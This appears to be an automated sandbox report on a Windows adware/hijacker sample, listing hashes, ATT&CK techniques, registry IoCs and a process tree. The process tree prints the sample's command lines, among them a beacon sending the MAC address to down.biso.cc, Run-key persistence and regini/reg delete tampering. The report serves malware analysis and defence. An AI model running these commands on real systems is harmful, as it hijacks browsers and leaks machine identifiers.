7b98de0154a6dd70e2fc1151911f328f74a068b80408285aeb5bb27fec1a6768

Analysis

max time kernel
170s
max time network
159s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
30/12/2023, 09:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

1481721ea6d463f3b093a57307af8620.exe
Size

191KB
MD5

1481721ea6d463f3b093a57307af8620
SHA1

44453df9ff359cc35771ab2b7ddff9a5eee1a8af
SHA256

7b98de0154a6dd70e2fc1151911f328f74a068b80408285aeb5bb27fec1a6768
SHA512

4ca12c661522d2e329f5f1c5d5b3bf327c859f7367626f07732860b1e8e13f721d6cfcf3b045929f9210f943242167312e8c2357fe4773c6f7eff7424bc9392e
SSDEEP

3072:T/na6WDmrZ5Cn79xvlr2xmOJ5wUuWXcfb0hw7IACb873684yVcx566/znwVxIPGV:T/nuDm9knmhJ4/sMLuO6/zjGLN8lk

Score

7^/10

persistence

Malware Config

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs	1481721ea6d463f3b093a57307af8620.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs	1481721ea6d463f3b093a57307af8620.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ÓÃÓÚÏµÍ³µÇÂ¼µÄÎÄ¼þ£¬É¾³ýµôÎÞ·¨Õý³£µÇÂ¼ÏµÍ³¡£ = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	1481721ea6d463f3b093a57307af8620.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7073a090e63cda01	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "410298224"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000429d3af34477a14f8b2dd769173341890000000002000000000010660000000100002000000085a59cb05486b3cbbf6390f5dabe296725622d3419bad50144227f86714cf086000000000e8000000002000020000000bca8cc1b8119881f9064739cd7ea2fa041dcc361dd462db88d6737865d7298c8200000005184d2ac20eb27e637c436e75afb8b3156fa8d8affae21526c46141748d7c86a40000000aa1f04daa20b6fe9f54c305db17243cc168a5a363772f37104bbcfc7d36cf1365613742b786bea4dc203ea062a3969384a5cf6a8640428b58e1f6d1d971fbdc0	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B4C958C1-A8D9-11EE-8183-5E688C03EF37} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000429d3af34477a14f8b2dd769173341890000000002000000000010660000000100002000000054f003eb8ac197efaff2831f75f171b4787a47fd60a3a6170aff17ef09c85f39000000000e80000000020000200000004cf0fe26b16955ab94ea1c8ee4adce7f4b2f3d2627c5c42343204d4c01acdaf2900000008420fcba92c2ca2ac4ccb6203f7ca6cb81b9e78997e2ba5120dd49044fc0d3bdb7a2dc62885db46010e837897bbb11aa4d726b048684fb7c1ac1c1e4c2f4c433d6bdba1794e68906cef43f01f9cc1e5c65546af4e3685dab6de6dbd98e4652836d64ebd19ab2c2712a4da8b47cd0a68a176c53da23d9c6db9dc20c5b64298e9812bc3d526ce8e06e8bebd93f64fbda6b400000008ccd3107092665edaf99032ed62b3bde1c4b93473b3b0ddefb2d9ca6c1529214a7d2694b834c656781bbdde727a07a0ba3d298af2d674a5852adce80c90f11cb	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.7400.net"	1481721ea6d463f3b093a57307af8620.exe

Modifies registry class 30 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\ieframe	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\InitPropertyBag\CLSID = "{13709620-C279-11CE-A49E-444553540000}"	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\shellex\MayChangeDefaultMenu	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\CLSID = "{3f454f0e-42ae-4d7c-8ea3-328250d6e272}"	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\InitPropertyBag\Param2 = "%ProgramFiles(x86)%\\Internet Explorer\\iexplore.exe"	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\InitPropertyBag\Param1 = "http://%77%77%77%2e%37%34%30%30%2e%6e%65%74"	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\shellex\MayChangeDefaultMenu\	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\InitPropertyBag\method = "ShellExecute"	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\InProcServer32	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\shellex	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\InitPropertyBag	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance\InitPropertyBag\command = "´ò¿ªÖ÷Ò³"	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\InProcServer32\ = "%SystemRoot%\\SysWow64\\shdocvw.dll"	1481721ea6d463f3b093a57307af8620.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\InProcServer32\ThreadingModel = "Apartment"	1481721ea6d463f3b093a57307af8620.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{81500852-3146-9562-8150-314655900001}\Instance	1481721ea6d463f3b093a57307af8620.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"%ProgramFiles(x86)%\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046}	1481721ea6d463f3b093a57307af8620.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2248	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2248	IEXPLORE.EXE
2248	IEXPLORE.EXE
2652	IEXPLORE.EXE
2652	IEXPLORE.EXE
2652	IEXPLORE.EXE
2652	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2876	2276	1481721ea6d463f3b093a57307af8620.exe	28
PID 2276 wrote to memory of 2876	2276	1481721ea6d463f3b093a57307af8620.exe	28
PID 2276 wrote to memory of 2876	2276	1481721ea6d463f3b093a57307af8620.exe	28
PID 2276 wrote to memory of 2876	2276	1481721ea6d463f3b093a57307af8620.exe	28
PID 2876 wrote to memory of 2248	2876	iexplore.exe	29
PID 2876 wrote to memory of 2248	2876	iexplore.exe	29
PID 2876 wrote to memory of 2248	2876	iexplore.exe	29
PID 2876 wrote to memory of 2248	2876	iexplore.exe	29
PID 2276 wrote to memory of 2208	2276	1481721ea6d463f3b093a57307af8620.exe	30
PID 2276 wrote to memory of 2208	2276	1481721ea6d463f3b093a57307af8620.exe	30
PID 2276 wrote to memory of 2208	2276	1481721ea6d463f3b093a57307af8620.exe	30
PID 2276 wrote to memory of 2208	2276	1481721ea6d463f3b093a57307af8620.exe	30
PID 2208 wrote to memory of 2812	2208	cmd.exe	33
PID 2208 wrote to memory of 2812	2208	cmd.exe	33
PID 2208 wrote to memory of 2812	2208	cmd.exe	33
PID 2208 wrote to memory of 2812	2208	cmd.exe	33
PID 2276 wrote to memory of 2588	2276	1481721ea6d463f3b093a57307af8620.exe	36
PID 2276 wrote to memory of 2588	2276	1481721ea6d463f3b093a57307af8620.exe	36
PID 2276 wrote to memory of 2588	2276	1481721ea6d463f3b093a57307af8620.exe	36
PID 2276 wrote to memory of 2588	2276	1481721ea6d463f3b093a57307af8620.exe	36
PID 2248 wrote to memory of 2652	2248	IEXPLORE.EXE	35
PID 2248 wrote to memory of 2652	2248	IEXPLORE.EXE	35
PID 2248 wrote to memory of 2652	2248	IEXPLORE.EXE	35
PID 2248 wrote to memory of 2652	2248	IEXPLORE.EXE	35
PID 2588 wrote to memory of 2496	2588	cmd.exe	38
PID 2588 wrote to memory of 2496	2588	cmd.exe	38
PID 2588 wrote to memory of 2496	2588	cmd.exe	38
PID 2588 wrote to memory of 2496	2588	cmd.exe	38
PID 2276 wrote to memory of 2476	2276	1481721ea6d463f3b093a57307af8620.exe	40
PID 2276 wrote to memory of 2476	2276	1481721ea6d463f3b093a57307af8620.exe	40
PID 2276 wrote to memory of 2476	2276	1481721ea6d463f3b093a57307af8620.exe	40
PID 2276 wrote to memory of 2476	2276	1481721ea6d463f3b093a57307af8620.exe	40
PID 2476 wrote to memory of 2156	2476	cmd.exe	42
PID 2476 wrote to memory of 2156	2476	cmd.exe	42
PID 2476 wrote to memory of 2156	2476	cmd.exe	42
PID 2476 wrote to memory of 2156	2476	cmd.exe	42
PID 2276 wrote to memory of 1660	2276	1481721ea6d463f3b093a57307af8620.exe	43
PID 2276 wrote to memory of 1660	2276	1481721ea6d463f3b093a57307af8620.exe	43
PID 2276 wrote to memory of 1660	2276	1481721ea6d463f3b093a57307af8620.exe	43
PID 2276 wrote to memory of 1660	2276	1481721ea6d463f3b093a57307af8620.exe	43
PID 1660 wrote to memory of 2828	1660	cmd.exe	45
PID 1660 wrote to memory of 2828	1660	cmd.exe	45
PID 1660 wrote to memory of 2828	1660	cmd.exe	45
PID 1660 wrote to memory of 2828	1660	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\1481721ea6d463f3b093a57307af8620.exe
"C:\Users\Admin\AppData\Local\Temp\1481721ea6d463f3b093a57307af8620.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://down.biso.cc/b/tj.asp?mac=5E:68:8C:03:EF:37&tid=1481721ea6d463f3b093a57307af8620
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://down.biso.cc/b/tj.asp?mac=5E:68:8C:03:EF:37&tid=1481721ea6d463f3b093a57307af8620
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2248 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\905841_s.ini
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2208
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Users\Admin\AppData\Local\Temp\905841_s.ini
    3⤵
    - Modifies registry class
    PID:2812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
    3⤵
    PID:2496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\905841.ini
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Users\Admin\AppData\Local\Temp\905841.ini
    3⤵
    - Modifies registry class
    PID:2156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
    3⤵
    PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
38b9ab9f4a2bca4f45f854b7295fed97

SHA1
ebca993687034638efc0bd9d993d1a4108bdd6d2

SHA256
399380edc6c34257333713aff589790b0748bbfea8bbc955ef8f41cc4c3e35b6

SHA512
d015b51a8446fa08c574041af4c6bebf5e3118ed8dffe9cea33225c82d69e21a7120659df7860f29db70710980c04c92b64cdfd7cfb606ec3b2a869de26eb89b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1b93e378c075ad5eac1fefc79b98f5a3

SHA1
55406bdc7ca9b68f6cb6b707a9ea0a9edd56cf9c

SHA256
c322159c35e48a13cbf967cb094bc0c275bc3958bd16af9a6e76effe1a903859

SHA512
45687a1e23d1928599c9a43eec339653ac95ff8f8bedc3b6dc38d6a02ce33d17e67310a5cd502ee9154311d772f7f24e2e100a2098b5d4a337ac2364c405b4c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
29b3ab2b8a22c2a23103f32e3ef74494

SHA1
c67f41c535b2514e6120ee99d08c653b6b3a544c

SHA256
da2b193a1a3c2d83de28f8b52587ab5058af1830b1b302c67c387c51ea575793

SHA512
653f72b74acf7bb8bdb17e127be1cd63dfef611764862add0137556c7c10ae17607a4b3e9f4b3af39a55d2f8e6a662634e3ff5db0bb6616397b0008fd71bd689

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9867c44bfece9dffa8272e191745c334

SHA1
cb9342d7ccb973c597ad4ee9492cc19646325723

SHA256
cae209aa41f16fc19ec88679ee0ebc03f39f1141f22c480db2c91b142c3e7f6a

SHA512
16877c7114e49f09333c362c59100f2cc4833ebb3700c8005247117d07b88b4eb045687815be13e2584db19d6644d37fb08d4ea7097f2a8fe76ae1fe8e30aaec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e7134e9508c45c444f902434a1fe8504

SHA1
da3149ae400ca255957d24a53a8e939d6d9e70b5

SHA256
f14859aa20e1b8e701ad62ef37104a21c344af862b1f2c6ed40831c80fc6d4b6

SHA512
10ae8e1879343573fe67eb355c529be5b5a067ce344d1b79558ba1c811b36368daaf21f9e808be1a4ee21d913c948cef5441cb85ca1f9d4f10d333d05b9bd156

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a351c1197dfafff9c478c8a4ad4fe206

SHA1
e48be6ef6132fd25ed50378e3c2e15ded2423835

SHA256
211253dcc709e99369729a8cc28bacf90758a21945bb151a60e9e79f5be52d31

SHA512
9b4e27ba05363ff766a9e7f1b80ac61b92761636a02acc3da7d33bfe38ebedd17cae77472331ad189d866ee89305e5132714042e428c14347fc6c2d18508447d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9f2833eb6079f15ebb02839261438ada

SHA1
9d67654c851f618189bb57b8c0622f6349360f2c

SHA256
28fd8d4878bf65da644dc5a6c4e6126d03ac7f1714d17402def580627ff6d726

SHA512
ab14d3abd0369e6f95da48ec897f0f3770fccd5d75785ed01afdf682bef36e531123d0ba65e2fd5875976ebb46b52a76475f28213cf96e7ac1927f7f276ddaaf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f4c903a64957409adb9b33fc2b375d51

SHA1
a0e4c28744595eb89fd465d7636346e7a4ab2699

SHA256
8774a4d164926a18c508bf32e7c69009e67bfd3859ebba9b59045f0a9f9c6b2f

SHA512
5ddf876f95bb15d114611f6493c14fb2e309813bdd73e1651f43fc4211e0d8402b3e63c58f07d150e75bc0d22423aeca07ce69cfe2a3392c5d3bb048c1998ae7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
794797b7129f0c7740da3e1993ab90f2

SHA1
46208fe0fbad1dc0054e940e3db94099b3629331

SHA256
3404ecbb1ff50792be231c114b9b757e1391e08093595d77bde9403c7637787e

SHA512
3ec4d8ad7a3c8e16b83ad7f43cf20736d34cb7ccc65d8cb1b8d17cb17a9a32583a4a4664da283d67192a018860b3086011c6922b840c8b77b90c4c6e6feddb40

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9a0c860619641e80a034eac3c89efd47

SHA1
c40703c5f8cdc70f387dbd9177f5041c67efea71

SHA256
4600b16b17d62bb6b9c2f04fe5557905ee83606807c64ff0785a057ec0964b15

SHA512
40fff20acb8954996d26d4fcbce7fd90bab39fe0dd3bed00e40031f0a8770af313a90d1e7f910d00725ae60f97b3dbe82820aa4cdca675f0a651fd6acab3113d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
4225da6672b7665813b0b55ea909efa9

SHA1
c69a503d6b77ef178081a5e188955a9efe14f3b0

SHA256
037342cf60d579120404b15e177b4aa437f80be340e63ce02ab9047005cb0d2c

SHA512
5af5e11ff5ed1622b0596716d3fa44a35f22729415e03f307c9863ad9ff2e762338cfe3896a778fe0b72c6d0742b71994554ba47e7db329e59f91f4e1d0d4c6f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
afadaf3046f0bb322033f4a5c960e7d5

SHA1
1dcc139e560a56411b3b9fa0fb16037be861f935

SHA256
02fa32a673ff1e1f6c7993db276a16723035fec6dd84264712c1978ed4697ce4

SHA512
a09dcccabf62080f679fafc9940ab2f491bccbb5e04662391a43095fcc107bd982d223377366c92a001a2b0abaf1d2a3ae294519dab83b6d350669ec70ba1528

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

